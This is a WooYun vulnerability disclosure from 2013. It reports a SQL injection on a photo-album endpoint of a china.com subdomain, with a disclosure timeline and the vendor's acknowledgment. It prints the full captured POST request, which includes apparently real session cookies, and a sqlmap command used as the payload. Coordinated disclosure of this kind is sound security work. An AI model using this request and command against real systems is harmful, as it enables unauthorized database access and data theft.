当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047109

漏洞标题:中华网某站点sql注入一枚(root权限)

相关厂商:中华网

漏洞作者: 剑无名

提交时间:2013-12-27 12:06

修复时间:2014-02-10 12:07

公开时间:2014-02-10 12:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-27: 细节已通知厂商并且等待厂商处理中
2013-12-31: 厂商已经确认,细节仅向厂商公开
2014-01-10: 细节向核心白帽子及相关领域专家公开
2014-01-20: 细节向普通白帽子公开
2014-01-30: 细节向实习白帽子公开
2014-02-10: 细节向公众公开

简要描述:

root权限啊....

详细说明:

还是登陆的注射液!

POST /photo/?_a=doeditalbum HTTP/1.1
Host: u.china.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://u.china.com/photo/?_a=editalbum&albumid=22615%E2%80%98
Cookie: vjuids=337db4518.1432e49d17b.0.d9c66b3aae2328; vjlast=1388051026.1388051026.30; nickname=gainover; bindMobile=0@; CP_USER=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; CP_USERINFO=XPSgpSN8qpvtfhRe4iMyqiw5cK-771d%2FMfxGjYOOzpQ%2FCfDvh4cl%2FmDp6IZyLRinJueXkUC3gLWVPArzV8xUYSAXQvSHCSoLSAoaJgJ6BpaGLWR2kbEN20GsgmIM8GzyHkyr0o7tJc9c9KClI3yqm-fW0GJZNc3Pt8d0bGS2gLAx%2FEaNg47OlHIsABTLKcpHw9sf62kxGiSqsIw%2FPXDnvsy49-Dp0ddOqsQdBf4bEuL7OQs9lCPkpc0n-ni7rmD13jFKSRv19v2NyWJ5gDkfNZ9kP7lGrkyJ8glMiLpoHXgyqW9wAjnfpw%3D%3D; CP_USERSCORE=7zksgJwhJRB9SRBISFsdOk01s5-pOqSMkKRy2mYSdTd0JJ7dOENvccevdYmUJhGP%2F1sU81ghyZQvRW7kRTRa%2F2VlKw8R-pJZzcPUptRZyaFezc4F1uFw5X-grxu%2FKcpVL4OX72wUC7yTnUDPFO8vndwsy2e0V4sxOXkCc8j9jdn9pk8ZXBlUZg%3D%3D; CP_BLOG=%2520%26%2520%26%2520%26%2520%26%2520%264fae9fb4cd7fc658f95844e51d8fbda0; ExistRegister=48brjY3WUEk=; china_variable=jpEe7N32pYwL3PdnymLaHF9WbNhnVCnHKFQ/JQEhnVURSC4YjLrL9TBREfj5txq/RQBsuVVBzYjaVVg2itMgsI1yJyabyhcBQu2t-NJrcw0=; sns_cp_user=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; sns_login_date=2013-12-26; sns_uid=10702650; sns_hash=4069c79ad53ba569055fc929ddf11881; sns_imhash=NLoZQ8u0aHBi2aiTYYYViRaNdo90%252FtJoU1BSa9gV51O%252FsyA0kZoYKDFib4AI%252FqGPjw6q5KfTSQ8%253D; PHPSESSID=jujebdp52up49m4edc5ig9f645
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
album_id=22615&photo_order=&album_info_name=123&album_info_privacy=P&album_info_pass=1&submitbutton=%E4%BF%9D%E3%80%80%E5%AD%98


payload:./sqlmap.py -r 1.txt --dbs
post型!

漏洞证明:

QQ图片20131226184526.jpg

QQ图片20131226184602.jpg


修复方案:

管理我来了

版权声明:转载请注明来源 剑无名@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-31 09:15

厂商回复:

已经与http://www.wooyun.org/bugs/wooyun-2013-047105一并通报中华网信息化主管部门领导和工作人员。

最新状态:

暂无

漏洞评价:

评论